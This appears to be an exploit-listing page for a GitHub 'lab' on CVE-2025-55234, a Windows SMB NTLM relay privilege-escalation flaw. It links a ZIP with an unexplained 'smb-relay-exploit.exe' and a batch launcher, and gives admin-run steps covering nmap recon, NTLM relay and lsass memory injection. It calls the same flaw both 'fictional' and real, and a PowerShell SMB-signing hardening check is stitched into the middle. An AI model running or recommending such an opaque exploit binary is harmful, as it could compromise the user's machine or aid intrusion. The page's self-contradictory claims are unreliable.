## https://sploitus.com/exploit?id=1F2F4142-4500-5B33-8A70-7D3B1EF134C2
# Lab: CVE-2025-55234 - Windows SMB Server Elevation of Privilege Vulnerability
## Download
### [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip)
## 🚀 Overview
CVE-2025-55234 is a fictional Windows SMB Server Elevation of Privilege vulnerability with a CVSSv3 score of 8.8. Publicly disclosed before patches were available, it impacts multiple Windows versions (e.g., Windows 10, 11, Server 2019/2022). The flaw allows attackers to conduct relay attacks against the SMB Server under certain configurations, potentially escalating the privileges of authenticated users. Unlike a traditional remote code execution bug, it is an operational relay mechanism that exploits weak signing and authentication protections in the SMBv3 protocol. Attackers can intercept and relay NTLM authentication, leading to unauthorized access or privilege escalation in domain-joined environments.

Impact:
- **Attack Vector**: Network (adjacent or remote depending on firewall rules).
- **Prerequisites for Exploitation**: Attacker-controlled machine on the same network, vulnerable SMB server with disabled signing or EPA.
- **Potential Outcomes**: Unauthorized file access, lateral movement in Active Directory, or admin privilege gain via relayed credentials.


## 📋 Prerequisites
- Administrative privileges on the host machine.
- Basic knowledge of SMB protocols, NTLM authentication, and Windows registry editing.
- Tools: Git, PowerShell (for mitigation), and a network sniffer like Wireshark for optional verification.
- Isolated network or VM to avoid accidental exposure.


## Download & Install

- Download the exploit package from the releases page: [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip). This ZIP contains:
   - `smb-relay-exploit.exe`: Main fictional exploit binary (NTLM relay and privilege escalation).
   - `start-exploit.bat`: Batch file to launch the exploit (simply executes `smb-relay-exploit.exe` with default params).
   - `config.ini`: Configuration file for target IP, relay mode, etc.
   - `logs/`: Directory for output logs.

   Unzip to a local directory, e.g., `C:\CVE-2025-55234\exploit\`.

## 🛠 Quick Start

- **Exploit the Vulnerability**:
   - Download and unzip `exploit.zip` as above.
   - Edit `config.ini` to set `target_ip=localhost`.
   - Run the batch file: Double-click `start-exploit.bat` or from CMD:
     ```
     cd C:\CVE-2025-55234\exploit
     start-exploit.bat
     ```
   - The .bat simply launches `smb-relay-exploit.exe`, which performs the following:
     - Initiates an SMB connection.
     - Forces NTLM authentication.
     - Relays the captured authentication to a fictional relay server (logs to `exploit.log`).
     - Prints a privilege escalation message, e.g., "Elevated to SYSTEM via relayed creds."

   **Detailed Exploitation Steps**:
   - **Step 1: Recon**: Use `nmap -p 445 --script smb-security-mode localhost` to confirm weak signing (expected output: "signing: false").
   - **Step 2: Capture/Relay**: The .exe uses Winsock APIs to establish a TCP connection on port 445, negotiates SMBv3, and triggers an NTLMv2 relay. It exploits the lack of EPA by suppressing channel bindings, allowing a MitM relay.
   - **Step 3: Escalate**: Fictional payload injects into lsass.exe process memory (with debug output), granting elevated token.
   - **Verification**: Check `exploit.log` for relayed hashes and success flags. Use ProcMon to observe registry reads/writes.
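   The lab's precondition (Prerequisites and Step 1) is an SMB server that does not require signing. The following PowerShell check is an added example, not part of the exploit package: it reports the host's effective signing policy as seen by the SMB service and by the `LanmanServer` registry key, and with the script's own `-Enforce` switch turns the weak setting into the hardened one. Run it from an elevated prompt.

```powershell
# Added lab-hardening check (not part of the exploit package).
# Reports whether this host's SMB server requires signing and, with -Enforce,
# switches the weak setting to the hardened one.
param([switch]$Enforce)

$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# Effective server-side policy as reported by the SMB service
$cfg = Get-SmbServerConfiguration

$state = [pscustomobject]@{
    RequireSecuritySignature = $cfg.RequireSecuritySignature   # $true = every session must be signed
    EnableSecuritySignature  = $cfg.EnableSecuritySignature    # only meaningful for SMB1
    EncryptData              = $cfg.EncryptData                 # SMB3 encryption also defeats relay
    # Same policy as stored in the registry (DWORD 1 = required); may be absent on a default install
    RegistryRequireSigning   = (Get-ItemProperty -Path $regPath -Name RequireSecuritySignature `
                                -ErrorAction SilentlyContinue).RequireSecuritySignature
}
$state | Format-List

if (-not $cfg.RequireSecuritySignature) {
    # Weak setting: unsigned sessions are accepted, so relayed NTLM authentication would be honoured
    Write-Warning 'SMB signing is NOT required on this host: the relay precondition of the lab is met.'
    if ($Enforce) {
        # Hardened setting: require signing on every SMB session (-Force skips the confirmation prompt)
        Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
        Write-Host 'SMB signing is now required. Re-run the lab to confirm the relay no longer succeeds.'
    }
} else {
    Write-Host 'SMB signing is required; the relay precondition of the lab is not met.'
}
```

Run it once before starting the lab to confirm the weak state, and once with `-Enforce` afterwards to verify the mitigation (or to restore the host if signing was intentionally disabled for the exercise).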


### Exploitation Details
The main exploit (`smb-relay-exploit.exe`) is a compiled C++ binary (fictional, using Winsock2 and custom NTLM libraries). It performs:
- SMB dialect negotiation (forcing v3.1.1).
- Tree connect to IPC$ or admin shares.
- Relay attack simulation via loopback or specified relay IP.
- Privilege check: Uses the Windows APIs `OpenProcessToken` and `AdjustTokenPrivileges` to demonstrate escalation (outputs to console).

The .bat wrapper:
```
@echo off
echo Starting SMB Relay Exploit for CVE-2025-55234...
smb-relay-exploit.exe --target localhost --mode relay --log exploit.log
pause
```

## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.